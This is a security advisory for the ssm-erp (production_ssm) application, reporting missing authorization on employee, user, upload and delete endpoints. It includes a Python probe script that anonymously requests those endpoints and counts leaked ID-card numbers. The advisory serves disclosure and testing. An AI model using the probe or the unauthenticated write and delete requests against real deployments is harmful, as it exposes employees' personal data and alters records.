feng_ha_ha/production_ssm
- <= 4288d53bd35757b27f2d070057aefb2c07bdd097
An improper authorization vulnerability has been identified in the production_ssm system (feng_ha_ha/megagao ssm-erp), affecting versions up to commit 4288d53bd35757b27f2d070057aefb2c07bdd097. The issue is located in an unknown function of EmployeeController.java, where access controls are not enforced. It affects multiple high-risk interfaces, including /employee/list, /material/list, /user/list, and various file and picture upload/delete endpoints. Because no authorization check is performed, unauthenticated users can reach sensitive data and functionality, including employee ID card details. Note that the listed interfaces span several controllers, not only EmployeeController, so every endpoint of the application should be treated as unprotected until it has been verified.
Exploiting this vulnerability bypasses authorization entirely: a user with no credentials can call restricted interfaces, upload or delete files and pictures, and read or manipulate employee data.
To reproduce this vulnerability, send a GET request to the /employee/list interface without any authentication (no session cookie). The response contains employee records including ID card information, which demonstrates that no access control is applied. Likewise, unauthenticated POST requests to /department/insert and /custom/delete_batch insert department records and batch-delete customer records, respectively, showing that write operations are equally unprotected. Because these POST endpoints modify data, run the reproduction only against a test instance.
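As an added example (not part of the advisory and not code from the ssm-erp project), the following probe script automates the reproduction steps above: it requests each listed interface with no cookies, refuses to follow redirects, and flags endpoints that answer an anonymous request with a 200 JSON body. It assumes the application's base URL is passed on the command line, that a properly protected endpoint would answer with 401/403 or a redirect to a login page rather than a 200 JSON body, and it uses an 18-character ID-number pattern only as a heuristic to count ID-card-shaped values in the leaked response. The `fake` responder used in the test is constructed data, not captured output from the product.

```python
"""Unauthenticated-access probe for the interfaces named in the advisory.

Added example. Assumptions: protected endpoints reply 401/403 or redirect to
a login page; an anonymous 200 carrying JSON means authorization is missing.
"""
import json
import re
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Interfaces named in the advisory, with the methods it describes.
ENDPOINTS: List[Tuple[str, str]] = [
    ("GET", "/employee/list"),
    ("GET", "/material/list"),
    ("GET", "/user/list"),
    ("POST", "/department/insert"),
    ("POST", "/custom/delete_batch"),
]

# Heuristic: an 18-character resident ID number (17 digits + digit or X),
# bounded so it does not match inside a longer digit run.
ID_CARD_RE = re.compile(r"(?<!\d)\d{17}[\dXx](?!\d)")

# A transport takes (method, url) and returns (status, Location header, body).
Sender = Callable[[str, str], Tuple[int, str, str]]


@dataclass
class Finding:
    method: str
    path: str
    status: int
    exposed: bool   # served application data to an anonymous request
    id_cards: int   # ID-number-shaped strings found in the body


def urllib_sender(method: str, url: str) -> Tuple[int, str, str]:
    """Send one request with no cookies and without following redirects."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # let 3xx surface as HTTPError instead of following it

    opener = urllib.request.build_opener(NoRedirect)
    # Empty POST body: enough to test whether the endpoint is reachable
    # without authentication; it does not attempt to insert or delete records.
    data = b"" if method == "POST" else None
    req = urllib.request.Request(url, data=data, method=method)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location", ""), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Location", ""), e.read().decode("utf-8", "replace")


def classify(method: str, path: str, status: int, location: str, body: str) -> Finding:
    """Flag a 200 response that carries a JSON object/array and is not a login redirect."""
    exposed = False
    if status == 200 and "login" not in location.lower():
        try:
            exposed = isinstance(json.loads(body), (dict, list))
        except ValueError:
            exposed = False  # HTML (e.g. a login form) is not application data
    return Finding(method, path, status, exposed, len(ID_CARD_RE.findall(body)))


def probe(base_url: str, send: Sender = urllib_sender) -> List[Finding]:
    """Probe every listed interface anonymously and classify each response."""
    base = base_url.rstrip("/")
    return [classify(m, p, *send(m, base + p)) for m, p in ENDPOINTS]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    for f in probe(target):
        tag = "EXPOSED" if f.exposed else "ok"
        print(f"{tag:8} {f.method:4} {f.path:24} status={f.status} id_cards={f.id_cards}")
```

Run it as `python probe.py http://host:port/context` against a test instance. Any line tagged EXPOSED reproduces the missing authorization check; a non-zero `id_cards` count on /employee/list corresponds to the ID card leak described above.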